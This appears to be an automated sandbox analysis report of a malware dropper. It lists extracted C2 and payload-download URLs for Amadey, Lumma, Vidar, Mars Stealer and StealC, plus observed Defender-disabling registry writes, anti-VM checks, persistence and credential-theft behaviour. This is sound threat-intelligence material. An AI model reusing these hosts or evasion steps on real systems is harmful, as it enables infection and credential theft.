Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
16/03/2025, 18:13
Static task
static1
Behavioral task
behavioral1
Sample
d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe
Resource
win10v2004-20250313-en
General
-
Target
d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe
-
Size
938KB
-
MD5
10b0224ea8be9e8e9098b528cc2c96b5
-
SHA1
fd18bdccb7547938e538da517a86446b1805f0e9
-
SHA256
d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43
-
SHA512
5cac4931ba679852f0873447fb84008ca1c0e4953f9a10764c5caf65d083985e50f534af75216279253d133a4320ffe290fdd438e812ac1824d349259c6bfd0b
-
SSDEEP
24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a02u:VTvC/MTQYxsWR7a02
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://gunrightsp.run/api
https://caliberc.today/api
https://pistolpra.bet/api
https://weaponwo.life/api
https://armamenti.world/api
https://selfdefens.bet/api
https://targett.top/api
https://armoryarch.shop/api
https://blackeblast.run/api
https://codxefusion.top/api
https://hardswarehub.today/api
https://pgadgethgfub.icu/api
https://hardrwarehaven.run/api
https://techmindzs.live/api
https://bz2ncodxefusion.top/api
https://quietswtreams.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
https://begindecafer.world/api
https://9garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://ksterpickced.digital/api
https://bugildbett.top/api
https://crosshairc.life/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://4legenassedk.top/api
https://htardwarehu.icu/api
https://cjlaspcorne.icu/api
https://ybugildbett.top/api
https://weaponrywo.digital/api
https://loadoutle.life/api
Extracted
vidar
13.2
e3a5dc9f3619e7e1987b9fcc98b49843
https://t.me/g_etcontent
https://steamcommunity.com/profiles/76561199832267488
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Extracted
marsstealer
Default
ctrlgem.xyz/gate.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
lumma
https://codxefusion.top/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 7 IoCs
resource yara_rule behavioral2/memory/3228-538-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3228-539-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3228-574-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3228-627-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3228-644-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3228-645-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3228-648-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/1572-1125-0x0000000000990000-0x0000000000DF2000-memory.dmp healer behavioral2/memory/1572-1130-0x0000000000990000-0x0000000000DF2000-memory.dmp healer behavioral2/memory/1572-1578-0x0000000000990000-0x0000000000DF2000-memory.dmp healer -
Healer family
-
Lumma family
-
Mars Stealer
An infostealer written in C++ based on other infostealers.
-
Marsstealer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 67d7a1d3b1.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 67d7a1d3b1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 67d7a1d3b1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 67d7a1d3b1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 67d7a1d3b1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 67d7a1d3b1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 67d7a1d3b1.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 67d7a1d3b1.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 67d7a1d3b1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 67d7a1d3b1.exe -
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f7d2444297.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0b606bee6c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 67d7a1d3b1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b10ab05d2e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3179f4144f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1ab6d4cae8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5b90e5b727.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5c87f8d2b6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 310PDDDSLO38N3Z92I98IN4L8EKWN.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 071adce9c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 1416 powershell.exe 53 4432 powershell.exe 93 1540 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1416 powershell.exe 4432 powershell.exe 1540 powershell.exe 5640 powershell.exe 464 powershell.exe 4968 powershell.exe -
Downloads MZ/PE file 36 IoCs
flow pid Process 10 1416 powershell.exe 413 6508 BitLockerToGo.exe 93 1540 powershell.exe 571 6212 MSBuild.exe 571 6212 MSBuild.exe 571 6212 MSBuild.exe 571 6212 MSBuild.exe 571 6212 MSBuild.exe 571 6212 MSBuild.exe 14 5472 rapes.exe 53 4432 powershell.exe 69 2760 futors.exe 162 2364 5c87f8d2b6.exe 580 6212 MSBuild.exe 283 5472 rapes.exe 400 3228 MSBuild.exe 400 3228 MSBuild.exe 405 5012 BitLockerToGo.exe 432 5472 rapes.exe 432 5472 rapes.exe 432 5472 rapes.exe 432 5472 rapes.exe 452 9060 BitLockerToGo.exe 55 2760 futors.exe 186 2760 futors.exe 17 5472 rapes.exe 17 5472 rapes.exe 17 5472 rapes.exe 17 5472 rapes.exe 17 5472 rapes.exe 17 5472 rapes.exe 17 5472 rapes.exe 32 2760 futors.exe 32 2760 futors.exe 32 2760 futors.exe 32 2760 futors.exe -
Uses browser remote debugging 2 TTPs 30 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 15640 msedge.exe 15648 msedge.exe 1992 chrome.exe 6312 chrome.exe 5600 msedge.exe 4060 msedge.exe 10116 msedge.exe 18276 chrome.exe 12484 chrome.exe 8128 chrome.exe 6824 chrome.exe 18100 chrome.exe 16240 msedge.exe 3952 chrome.exe 4500 msedge.exe 3764 chrome.exe 1660 chrome.exe 7688 chrome.exe 17640 chrome.exe 5088 chrome.exe 10136 msedge.exe 16228 msedge.exe 1972 chrome.exe 17972 chrome.exe 5432 chrome.exe 8112 chrome.exe 10608 msedge.exe 10596 msedge.exe 4084 chrome.exe 17980 chrome.exe -
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b10ab05d2e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5c87f8d2b6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5b90e5b727.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f7d2444297.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 071adce9c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 67d7a1d3b1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f7d2444297.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0b606bee6c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3179f4144f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 310PDDDSLO38N3Z92I98IN4L8EKWN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 310PDDDSLO38N3Z92I98IN4L8EKWN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1ab6d4cae8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 67d7a1d3b1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 071adce9c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5c87f8d2b6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5b90e5b727.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0b606bee6c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3179f4144f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1ab6d4cae8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b10ab05d2e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation m0wsoI3.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation zY9sqWs.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation m0wsoI3.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation rapes.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk Vv4PwOXY3OMt59cD.exe -
Executes dropped EXE 54 IoCs
pid Process 4732 TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE 5472 rapes.exe 4480 rapes.exe 5172 amnew.exe 2760 futors.exe 3120 UD49QH6.exe 3680 m0wsoI3.exe 1188 trano1221.exe 5148 trano1221.exe 2480 cronikxqqq.exe 5528 cronikxqqq.exe 3528 00e7be516b.exe 3048 dw.exe 1672 TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE 2376 v7942.exe 3352 3179f4144f.exe 3936 crypted.exe 4336 483d2fa8a0d53818306efeb32d3.exe 2364 5c87f8d2b6.exe 4956 crypted.exe 5184 crypted.exe 1188 mrwipre12.exe 1828 5b90e5b727.exe 408 310PDDDSLO38N3Z92I98IN4L8EKWN.exe 6084 1ab6d4cae8.exe 2080 1ab6d4cae8.exe 1572 67d7a1d3b1.exe 1544 b10ab05d2e.exe 5716 rapes.exe 2176 futors.exe 2316 071adce9c6.exe 5224 37q1nohlny.exe 2364 f7d2444297.exe 5300 g4790zmg47.exe 6640 7yc2nozmoz.exe 6692 Vv4PwOXY3OMt59cD.exe 6908 U6eP6xfYmpVYiDt2.exe 11128 m0wsoI3.exe 7280 UD49QH6.exe 8300 HmngBpR.exe 12796 SplashWin.exe 14596 zY9sqWs.exe 15016 SplashWin.exe 10276 Gxtuum.exe 9236 7d3979aba3.exe 7128 7d3979aba3.exe 15316 7d3979aba3.exe 11112 a38b042cfd.exe 7328 IECFBKFHCA.exe 7960 JKJKJJDBKE.exe 20144 GDBFHDHJKK.exe 20160 Yw8eoD2DQkVL2niY.exe 20376 OsWdfcBuOS504XIe.exe 11524 0b606bee6c.exe -
Identifies Wine through registry keys 2 TTPs 18 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 5c87f8d2b6.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 5b90e5b727.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 1ab6d4cae8.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine b10ab05d2e.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 3179f4144f.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine f7d2444297.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 67d7a1d3b1.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 071adce9c6.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 310PDDDSLO38N3Z92I98IN4L8EKWN.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 0b606bee6c.exe -
Loads dropped DLL 44 IoCs
pid Process 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 5148 trano1221.exe 3680 m0wsoI3.exe 3680 m0wsoI3.exe 11128 m0wsoI3.exe 11128 m0wsoI3.exe 12796 SplashWin.exe 12796 SplashWin.exe 12796 SplashWin.exe 15016 SplashWin.exe 15016 SplashWin.exe 15016 SplashWin.exe 11112 a38b042cfd.exe 6212 MSBuild.exe 6212 MSBuild.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 67d7a1d3b1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 67d7a1d3b1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b90e5b727.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235950101\\5b90e5b727.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1ab6d4cae8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235960101\\1ab6d4cae8.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1ab6d4cae8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10030290101\\1ab6d4cae8.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\67d7a1d3b1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235970101\\67d7a1d3b1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b10ab05d2e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10030300101\\b10ab05d2e.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleChrome = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lQajfhr8\\Vv4PwOXY3OMt59cD.exe" Vv4PwOXY3OMt59cD.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5c87f8d2b6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235940101\\5c87f8d2b6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\00e7be516b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235690101\\00e7be516b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235700121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000024303-346.dat autoit_exe behavioral2/files/0x00080000000242bd-845.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid Process 4732 TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE 5472 rapes.exe 4480 rapes.exe 3120 UD49QH6.exe 1672 TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE 3352 3179f4144f.exe 4336 483d2fa8a0d53818306efeb32d3.exe 2364 5c87f8d2b6.exe 1828 5b90e5b727.exe 408 310PDDDSLO38N3Z92I98IN4L8EKWN.exe 2080 1ab6d4cae8.exe 1572 67d7a1d3b1.exe 1544 b10ab05d2e.exe 5716 rapes.exe 2316 071adce9c6.exe 2364 f7d2444297.exe 7280 UD49QH6.exe 11524 0b606bee6c.exe -
Suspicious use of SetThreadContext 12 IoCs
description pid Process procid_target PID 2480 set thread context of 5528 2480 cronikxqqq.exe 104 PID 2376 set thread context of 3228 2376 v7942.exe 131 PID 3936 set thread context of 4500 3936 crypted.exe 141 PID 4956 set thread context of 5184 4956 crypted.exe 159 PID 1188 set thread context of 5568 1188 mrwipre12.exe 165 PID 2080 set thread context of 5012 2080 1ab6d4cae8.exe 212 PID 5300 set thread context of 6212 5300 g4790zmg47.exe 216 PID 1544 set thread context of 6508 1544 b10ab05d2e.exe 217 PID 2364 set thread context of 9060 2364 f7d2444297.exe 239 PID 15016 set thread context of 11388 15016 SplashWin.exe 257 PID 9236 set thread context of 15316 9236 7d3979aba3.exe 264 PID 7328 set thread context of 7580 7328 IECFBKFHCA.exe 284 -
resource yara_rule behavioral2/files/0x00070000000242e3-254.dat upx behavioral2/memory/5148-258-0x00007FF991AF0000-0x00007FF9920D9000-memory.dmp upx behavioral2/files/0x0007000000024298-260.dat upx behavioral2/files/0x00070000000242df-265.dat upx behavioral2/memory/5148-269-0x00007FF9A9150000-0x00007FF9A915F000-memory.dmp upx behavioral2/memory/5148-268-0x00007FF9A5190000-0x00007FF9A51B3000-memory.dmp upx behavioral2/memory/5148-306-0x00007FF9A64D0000-0x00007FF9A64DD000-memory.dmp upx behavioral2/memory/5148-305-0x00007FF9A5900000-0x00007FF9A5919000-memory.dmp upx behavioral2/memory/5148-304-0x00007FF9A6790000-0x00007FF9A67A9000-memory.dmp upx behavioral2/memory/5148-307-0x00007FF9A4C10000-0x00007FF9A4C3D000-memory.dmp upx behavioral2/memory/5148-308-0x00007FF9A4B60000-0x00007FF9A4B96000-memory.dmp upx behavioral2/memory/5148-309-0x00007FF9A64C0000-0x00007FF9A64CD000-memory.dmp upx behavioral2/memory/5148-310-0x00007FF9A4B20000-0x00007FF9A4B53000-memory.dmp upx behavioral2/memory/5148-311-0x00007FF9A10A0000-0x00007FF9A116D000-memory.dmp upx behavioral2/memory/5148-313-0x00007FF9915D0000-0x00007FF991AF0000-memory.dmp upx behavioral2/memory/5148-312-0x00007FF991AF0000-0x00007FF9920D9000-memory.dmp upx behavioral2/memory/5148-315-0x00007FF9A5190000-0x00007FF9A51B3000-memory.dmp upx behavioral2/memory/5148-316-0x00007FF9A0C80000-0x00007FF9A0D4F000-memory.dmp upx behavioral2/memory/5148-331-0x00007FF9A6790000-0x00007FF9A67A9000-memory.dmp upx behavioral2/memory/5148-333-0x00007FF9A1490000-0x00007FF9A1517000-memory.dmp upx behavioral2/memory/5148-332-0x00007FF9A5900000-0x00007FF9A5919000-memory.dmp upx behavioral2/memory/5148-340-0x00007FF9A0B60000-0x00007FF9A0C7C000-memory.dmp upx behavioral2/memory/5148-341-0x00007FF9A1880000-0x00007FF9A18C3000-memory.dmp upx behavioral2/memory/5148-351-0x00007FF9A4AD0000-0x00007FF9A4AE2000-memory.dmp upx behavioral2/memory/5148-350-0x00007FF9A10A0000-0x00007FF9A116D000-memory.dmp upx behavioral2/memory/5148-349-0x00007FF9A4B20000-0x00007FF9A4B53000-memory.dmp upx behavioral2/memory/5148-339-0x00007FF9A4B60000-0x00007FF9A4B96000-memory.dmp upx behavioral2/memory/5148-338-0x00007FF9A5940000-0x00007FF9A594B000-memory.dmp upx behavioral2/memory/5148-337-0x00007FF9A4AF0000-0x00007FF9A4B16000-memory.dmp upx behavioral2/memory/5148-336-0x00007FF9A4BF0000-0x00007FF9A4C04000-memory.dmp upx behavioral2/memory/5148-367-0x00007FF991380000-0x00007FF9915C9000-memory.dmp upx behavioral2/memory/5148-370-0x00007FF9A0C80000-0x00007FF9A0D4F000-memory.dmp upx behavioral2/memory/5148-369-0x00007FF9912C0000-0x00007FF99137C000-memory.dmp upx behavioral2/memory/5148-368-0x00007FF9A09D0000-0x00007FF9A09FE000-memory.dmp upx behavioral2/memory/5148-365-0x00007FF9A0A00000-0x00007FF9A0A24000-memory.dmp upx behavioral2/memory/5148-364-0x00007FF9915D0000-0x00007FF991AF0000-memory.dmp upx behavioral2/memory/5148-372-0x00007FF9A1490000-0x00007FF9A1517000-memory.dmp upx behavioral2/memory/5148-375-0x00007FF99C520000-0x00007FF99C54B000-memory.dmp upx 